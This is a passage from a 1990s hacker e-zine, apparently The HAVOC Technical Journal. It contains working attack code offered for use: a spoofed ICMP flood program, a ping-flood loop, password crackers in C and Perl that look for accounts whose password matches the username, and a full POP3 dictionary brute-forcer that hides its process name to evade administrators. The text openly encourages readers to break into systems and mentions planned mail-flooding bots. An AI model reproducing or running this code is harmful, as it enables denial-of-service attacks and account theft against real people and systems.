floodloop; banner(); if (parse_args(argc,argv)) { usage(argv[0]); return; } resolve_all(dest_name, spoof_name); give_info(); s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); #ifdef IP_HDRINCL fprintf(stderr,"We have IP_HDRINCL! =] \n\n"); if (setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0) { perror("setsockopt IP_HDRINCL"); exit(1); } #else fprintf(stderr,"We don't have IP_HDRINCL! =[\n\n"); #endif if (!flood) { if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1) { printf("%s: error sending ping packet\n",argv[0]); perror(""); return; } } else { floodloop = 0; if ( pingnmbr && (pingnmbr > 0) ) { printf("flooding... packet limit set.\n"); for (i=0;i<pingnmbr;i++) { if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1) { printf("%s: error sending packet\n",argv[0]); perror(""); return; } usleep((pingsleep*1000)); if (!(floodloop = (floodloop+1)%25)) { fprintf(stdout,"."); fflush(stdout); } } printf("flooding completed - %u packets sent.\n", pingnmbr); } else { printf("flooding. each dot equals 25 packets.\n"); for (i=0;i<1;i) { if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1) { printf("%s: error sending packet\n",argv[0]); perror(""); return; } usleep(900); if (!(floodloop = (floodloop+1)%25)) { fprintf(stdout,"."); fflush(stdout); } } } } } ----------------------- ping floods ----------------------- Ping floods are very similar to ICMP_ECHO floods, in that they both send thousands of replies that the host you are attacking will reply to, not realizing that repling to the ping can be bogging down system resources. Probably one of the bets ways to run these is with a IP spoofer, so the computer takes more time trying to reply to a dead ip, and it also will keep your sysadmin yelling at you in case the attacked host sysdamin traces the connection. from the command prompt you could use: ping -s 4000 host & * if you are running linux, then just use the -f command which sends out pings as fast as possible, thus bogging the remote system. Or you could code this simple C program: /* pingkill.c - by Scud-O */ #include <stdio.h> #include <stdlib.h> void main() { while(1) { system (ping -s 4000 host); sleep(3); } } You can also use a for loop or a counter if you do not want this program to run forever. ----------------------------------- PLEASE NOTE: for any of these attacks it is advisable to run them in the background, since these attacks can take some time, especially if the system is quite large. ( if you dont know how to run stuff in the background, go hang yourself ( actually just add a & at the end of a command, and if you want the command to still run after you log off, do a nohup command & ) ) ------------------------------------------------------------------- * Thanks to daemon9 for his indepth discussion of TCP/SYN flooding in phrack 48. * Thanks to Keystroke for the code, and to who ever wrote it. ---------------------------- * If you need ANY help to fight off these attacks, just e-mail me and I will be glad to help you. - Scud-O ( FoxMulder@worldnet.att.net ) ___________________________________________________________________ [The 'g0d' Project] General Info, Techniques, Etc by Scud-O ....................................... The 'g0d' Project is <c> HBS 1996,1997 !ALL RIGHTS RESERVED! ....................................... I. Introduction The first question you must be having about this little project is... But Aren't you an athiest? Well, yes, but this project was named after god because I find it quite humorous, and the fact that it is easy to come up with good quotes for 'g0d' to say. II. What the hell is 'g0d'? Well, to put it simply, 'g0d' is what will be developed into an AI Bot for IRC. Why? Well, because it seems like I cool idea. I have heard of another bot called 'mama' written by a Peter Sjostrom, and is on some irc servers #amiga, but I can not confirm this. III. How the hell did you come up with this idea? Well, one night when I was ENCREDIBLY bored on IRC, I changed my nick to g0d and pretended to be the AI Bot. It was quite fun, and many fools believed me. So after that night I started to think, hell maybe I COULD code a simple AI bot and then keep extending its powers. IV. When is 'g0d' going online? Well, currently I am debating whether to code g0d in C or HEAVILY modify an eggdrop to my needs. I WAS going to add g0d to #phreak a while back, but g0d was to run on tombin's server, and well he fucked up my account, so to date ( 2/22/97 ) g0d in his eggdrop form is not online. But I predict that I can get a VERY simple version of 'g0d' up by early June, or sooner, it all depends on my work load and if I EVER get some sleep since lately I have been becoming an insomiac and not been sleeping. V. How the hell do you expect this to work? Well, really it is very simple. The will be 2 main parts to this bot, The actual bot which communicates to the servers manages its connection, writes and reads text, etc, And the actual AI part of the bot. The AI will mainly consist of a string parser, which will tear up users words, and then if they match any of the bots files, it will reply. g0d will hopefully also watch over quit messages and identify netspilts, offer files, and of course offer those ever so funny quotes when a user on the list joins the channel and then op them. VI. g0d v0.11 g0d version 0.11 should be up soon. This version will have only VERY limited AI, almost none really, and is to be based on |\|\cFill's bot example in THTJ 5. So if you see g0d on #phreak say hello and see what he does. heh. ....................................... live in fear, g0d is coming to punish the sinners and reward the disciples! ....................................... Watch for this and other bots coming soon from HBS! Reload - A very basic bot that basically just visits and revisits the same web page or pages over and over (helps with the web counters no?) Black Widow - Site indexer or spider (similar to the ones that servers like Lycos and others) with a possible feature that 'rates' web pages using a VERY basic parser like in 'g0d' Newman - Just like the character from 'Seinfeld' this little bot will play havoc on users mail and possibly news ( random news cancels? random mail floods? what will happen next? ) ___________________________________________________________________ NOAOL.CGI will be here next month! ___________________________________________________________________ RTFM : UNIX Basics 101 Last month I wanted to write my own beginner's guide to UNIX, but with deadlines and failing grades, it was not to be. So instead I had to add a lame old lod text. Anyway, here it is, MY very own guide to UNIX, and basic UNIX crackin. Enjoy. [Basic UNIX Info And Cracks] by Scud-O If you didnt know, UNIX was first created at AT&T Bell Labs in 1969 after the wake of the failed Multix project. Since those days, AT&T has greatly improved it, The University of California at Berkley has made their own version ( BSD), which is also quite popular, Sun makes a version, and of course there is the ever popular linux for the PCs. During this time, UNIX took over the Internet, and is the domiant OS in the world. Sounds like it would be extremely useful to know for both hacking, and future jobs, doesnt it? Well you are in luck... this file is here to help. Basic UNIX Commands: Many UNIX commands are fairly simple, ( while some are very complex, you will probably not use them or encounter them much, since they are used to manipulate files, etc.) and if you know DOS, many of the commands are similar. First: A basic run down of commands: start bourne shell sh start c shell csh start korn shell ksh call up a unix system (modem) cu chat with a user talk clear screen clear run command at a specific time at run a series of commands batch compile c programs cc compress file compress uncompress file uncompress copy a file cp count words in a file wc create new text file cat, vi, ed change current directory cd stop a process kill date + time date delete file rm make directory mkdir disk usage by dir du dir list ls remove a dir rmdir print working directory pwd display free or total space df display file cat,page,more edit file vi, ed email mail, elm, pine notify on email notify encrypt file crypt display/set environment env exit exit find file find change ownership chown change file permissions chmod move file mv save a log of current session script login as another user su remote host login rlogin, telnet login system login run commands after you logg off nohup run commands in background add '&' after program run commands a low priority nice send msg to all users wall turn on/off talk mesg system news news show machines on network ruptime set password passwd pause before command sleep print lp show processes ps link files ln start remont shell on a system rsh check spelling spell info on unix system uname info on user who info on user finger write messages to user write help man ---------- These are just some of the few commands a UNIX systems provides. There are of course the usual Internet commands also: telnet remote system login ftp file transfers mail email irc irc! lynx world wide web news newsgroups etc... The commands you will use the most: copy file cp create text file cat, vi, ed change current directory cd delete file rm dir list ls (use ls -l for more info) make dir mkdir display a file cat,more,page edit files vi, ed show processes ps help man ----------------------------------- These commands will get you though about 90% of common day to day UNIX life. I recommend that you (a) Buy a simple book on UNIX, and (b) Get an ISP with shell accounts, or use the shell that your ISP offers. Don't try to hack a shell just yet, pay for one until you are fairly well used to unix, and then work on cracking accounts. evilempire.org will be offering shells when it opens, L0pht offers them, and most ISPs will sell you to you. [Basic Cracks] If you look back at issue 7 there is an article called Joes. A Joe is a user that uses his userid as his password. I have included the C code from that article to make your life simple. /********************************************************************** * joetest.c * * a -SIMPLE- password cracker that cracks account with the same username and * password. (a 'joe') * * NOTE: If your system has shadowed passwords, then this must be run as root! * * Written for The HAVOC Technical Journal issue 7 by Scud-O * http://www.geocities.com/SiliconValley/8805/ ***********************************************************************/ #include <stdio.h> #include <pwd.h> int main(int argc, char **argv) { struct passwd *pw; while(pw=getpwent() ) { char *crypt(); char *result; result = crypt(pw->pw_name,pw->pw_passwd); if(!strcmp(result,pw->pw_name,pw->pw_passwd)) { printf(" %s is a joe\n", pw->pw_name); } } exit(0); } I have included this file, since most systems have a c compiler. Just use: cc joetest.c to compile, and the run it. On may small systems you may turn up nothing, and on larger systems you should probably find a few, but you never know! I also have 2 perl scripts that do the same thing, but one has a few added features. I gave you the C code, since not all systems have perl, due to security holes. #!/usr/local/bin/perl # joetest for perl while (($name, $passwd) = getpwent) { print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd); } This code is for perl 5 only, and it includes some more features: #!/usr/local/bin/perl # joetest for perl 5 ( super joetest ) while (($name, $passwd) = getpwent) { print "$name is a joe\n" if (crypt($name,$passwd) eq $passwd); print "$name has no password\n" if !$passwd; print "$name is a JOE\n" if (crypt(uc($name),$passwd) eq $passwd); print "$name is a Joe\n" if (crypt(ucfirst($name),$passwd) eq $passwd); print "$name is a eoj\n" if (crypt(scalar reverse $name,$passwd) eq $passwd); } ---------------------------------------------- Just so you know: The passwords on a system are kept in the file /etc/passwd . On some systems, the file is shadowed, so only the admin can see the passwords Passwords are also encrypted using crypt, which is a fairly strong one way encryptor.Here is what a passwd file may look like: root:WnDFHddnKu28M:0:1:system PRIVILEGED account:/:/bin/csh nobody:*Nologin:65534:65534:anonymous NFS user:/: nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/: daemon:*:1:1:system background account:/: bin:*:3:4:system librarian account:/bin: . . . rest of the lines have been deleted to save space... . . ------------------------------------------------------ These programs should all give you a quick into to hacking, and provide some fun until next month. There is still much to cover, but this issue is over due, and I need to get it out, so just wait until next month when we will have more great info for you all. ------------------ For the end of this month, I know that you will want to try to do some REAL hacking now that you know some UNIX, and not just play around on some shell account you are paying for, so I have included this c program that with a host name, a password file, and a dictionary, it will find POP ( post office protocol -- the commonly used mail protocol) passwords, which many time, thanks to users stupidity, are the same as the full account passwords. Anyway, have fun, to compile it: cc pop3hack.c , should do very well for you. Also, remember from here on out, you are actually doing something illegal, so stop and think about this for a minute.... are you ready? are you gunna hack? If you dont say 'hell yes' prepare to be smacked! -- pop3hack.c -- #include <stdio.h> #include <string.h> #include <signal.h> #include <unistd.h> #include <sys/param.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdarg.h> /* First, define the POP-3 port - almost always 110 */ #define POP3_PORT 110 /* What we want our program to be masked as, so nosy sysadmins dont kill us */ #define MASKAS "vi" /* Repeat connect or not - remember, logs still report a connection, so you might want to set this to 0. If set to 0, it will hack until it finds 1 user/password then exit. If set to 1, it will reconnect and try more user/passwords (until it runs out of usernames) */ #define RECONNECT 0 /* The function prototypes */ void nuke_string(char *); int pop_connect(char *); int pop_guess(char *, char *); char *getanswer(char *); char *getanswer_(char *); void swallow_welcome(void); void hackity_hack(void); int popfd; FILE *popfp; FILE *userfile; FILE *dictfile; char host[255]; char dict[255]; char user[255]; main(int argc, char **argv) { if(argc < 4) { /* invalid syntax, display syntax and exit */ printf("Syntax: %s host userfile dictfile\n", argv[0]); exit(0); } /* Validate that the host exists */ if(pop_connect(argv[1]) == -1) { /* Error */ printf("Error connecting to host %s\n", argv[1]); exit(0); } printf("Connected to: %s\n\n", argv[1]); /* Check for the existance of the user file */ userfile=fopen(argv[2], "rt"); if(userfile==NULL) { /* Error */ printf("Error opening userfile %s\n", argv[2]); exit(0); } fclose(userfile); /* Checking for the existance of dict file */ dictfile=fopen(argv[3], "rt"); if(dictfile==NULL) { /* Error */ printf("Error opening dictfile %s\n", argv[3]); exit(0); } fclose(dictfile); /* Copy important arguments to variables */ strcpy(host, argv[1]); strcpy(user, argv[2]); strcpy(dict, argv[3]); nuke_string(argv[0]); nuke_string(argv[1]); nuke_string(argv[2]); nuke_string(argv[3]); strcpy(argv[0], MASKAS); swallow_welcome(); hackity_hack(); } void nuke_string(char *targetstring) { char *mystring=targetstring; while(*targetstring != '\0') { *targetstring=' '; targetstring++; } *mystring='\0'; } int pop_connect(char *pophost) { int popsocket; struct sockaddr_in sin; struct hostent *hp; hp=gethostbyname(pophost); if(hp==NULL) return -1; bzero((char *)&sin,sizeof(sin)); bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length); sin.sin_family=hp->h_addrtype; sin.sin_port=htons(POP3_PORT); popsocket=socket(AF_INET, SOCK_STREAM, 0); if(popsocket==-1) return -1; if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1) return -1; popfd=popsocket; return popsocket; } int pop_guess(char *username, char *password) { char buff[512]; sprintf(buff, "USER %s\n", username); send(popfd, buff, strlen(buff), 0); getanswer(buff); sprintf(buff, "PASS %s\n", password); send(popfd, buff, strlen(buff), 0); getanswer(buff); if(strstr(buff, "+OK") != NULL) { printf("USERNAME: %s\nPASSWORD: %s\n\n", username, password); return 0; } else return -1; } char *getanswer(char *buff) { for(;;) { getanswer_(buff); if(strstr(buff, "+OK") != NULL) return buff; if(strstr(buff, "-ERR") != NULL) return buff; } } char *getanswer_(char *buff) { int ch; char *in=buff; for(;;) { ch=getc(popfp); if(ch == '\r'); if(ch == '\n') { *in='\0'; return buff; } else { *in=(char)ch; in++; } } } void swallow_welcome(void) { char b[100]; popfp=fdopen(popfd, "rt"); getanswer(b); } void hackity_hack(void) { char *un; char *pw; char *c; int found=0; un=(char *)malloc(512); pw=(char *)malloc(512); if(un==NULL || pw==NULL) return; userfile=fopen(user, "rt"); dictfile=fopen(dict, "rt"); if(userfile == NULL || dictfile == NULL) return; for(;;) { while(fgets(un, 50, userfile) != NULL) { found=0; c=strchr(un, 10); if(c != NULL) *c=0; c=strchr(un, 13); if(c != NULL) *c=0; while(fgets(pw, 50, dictfile) != NULL && found==0) { c=strchr(pw, 10); if(c != NULL) *c=0; c=strchr(pw, 13); if(c != NULL) *c=0; if(strlen(pw) > 2 && strlen(un) > 2) if(pop_guess(un, pw)==0) { found=1; fclose(popfp); close(popfd); if(RECONNECT==0) { free(pw); free(un); fclose(userfile); fclose(dictfile); exit(0); } pop_connect(host); swallow_welcome(); } } fclose(dictfile); dictfile=fopen(dict, "rt"); } fclose(dictfile); fclose(userfile); free(un); free(pw); exit(0); } } -- pop3hack.c -- Next Month: Real Hacking ___________________________________________________________________ HBS Who is HAVOC Bell Systems? Scud-O : Linux Lammah psych0 : All Around Lammah Keystroke : Mad PLA Insider (issue 9 submissions editor) REality : the Digital Man UnaBomber : (busted again?) memor : the MAN in France Agrajag : yet another MAD PLA insider! Digital_X : the rewt 0f A11 3\/i1! theLURK3R : almost g0dlike Redtyde : a demigod darkcyde : The brother from another planet! disc0re : The pain in AT&T's arse (issue 9 distributer) KungFuFox : The Guest Editor for issue 9! ----------- * |\|\cFill and SanchoPanza have been taken off, since mainly they are MIA Cool Undernet Channels: #phreak, #hackers, #corrupt Cool People: ArcAngl : the OTHER BellAtlantic phreak darc : The MAN Jisa : she looks just like Scully.. I Swear! ec|ipse : I'm coming to your house to kill you fool! zeth : the cellular 'GOD' phire : liked the SSI article in hacknowledge issue 2! dr1x : showed our lame asses how to start up confs tombin : thanks fer the account! - wtf did you do to it? CiND3R : you ever REALLY there anymore? hrdluk : thanks for connecting me and REality yesimlame : are you ever really on anymore? digipimp : where the hell is yer article? btm : you are god WeatherM : pan1k's right hand man Demonweed : welcome back BC219 : da other #phreak chick Defraz : future hoster of evilempire.org( until co-location) trixert : (aka trix-ahoy) same Po0f : #corrupt / CorrupT creator Cool mofos: Setuidrwt, iCBM, CraKerJaK, AnTiFiRe Lammah(s) of the Month: _Kinst_ : BITCH! ------------------------------------------------------------------- This Month Question(s): Why is Kung going to edit issue 9? Because not only does he kick major arse monkeys, he agreed to do it. But Kung isnt the only one on the new THTJ editorial staff. both Keystroke and disc0re have prominent roles in next issues release. So send them some e-mails tellin em to make the issue better than the rest so Scud-O doesnt come back! keystroke@thepentagon.com | ender@multigames.com | don't mail disc0re Next Month's Question: For KungFuFox to decide.... ------------------------------------------------------------------- Next Month: This MAY be what we will have in issue 9 - Java Virues Pt. I - MAPI Mailbombing and other funky ass shit - TAPI - overview, dos source, win95 source(?) - ICMP - overview - TFTP Weaknesses - More from the RTFM - Much, Much more TBA! Issue 9 is out April 1st! Send all articles for issue 9 to: keystroke@thepentagon.com Cya next issue! - The leet mofo's at THTJ ========================================================== = Is this copy of The HAVOC Technical Journal Skunked? = = If this file doesn't read at 67879 bytes, it probably = = doesn't have a born on date! Get a fresh copy from our = = site at: http://www.geocities.com/SiliconValley/8805/ = ==========================================================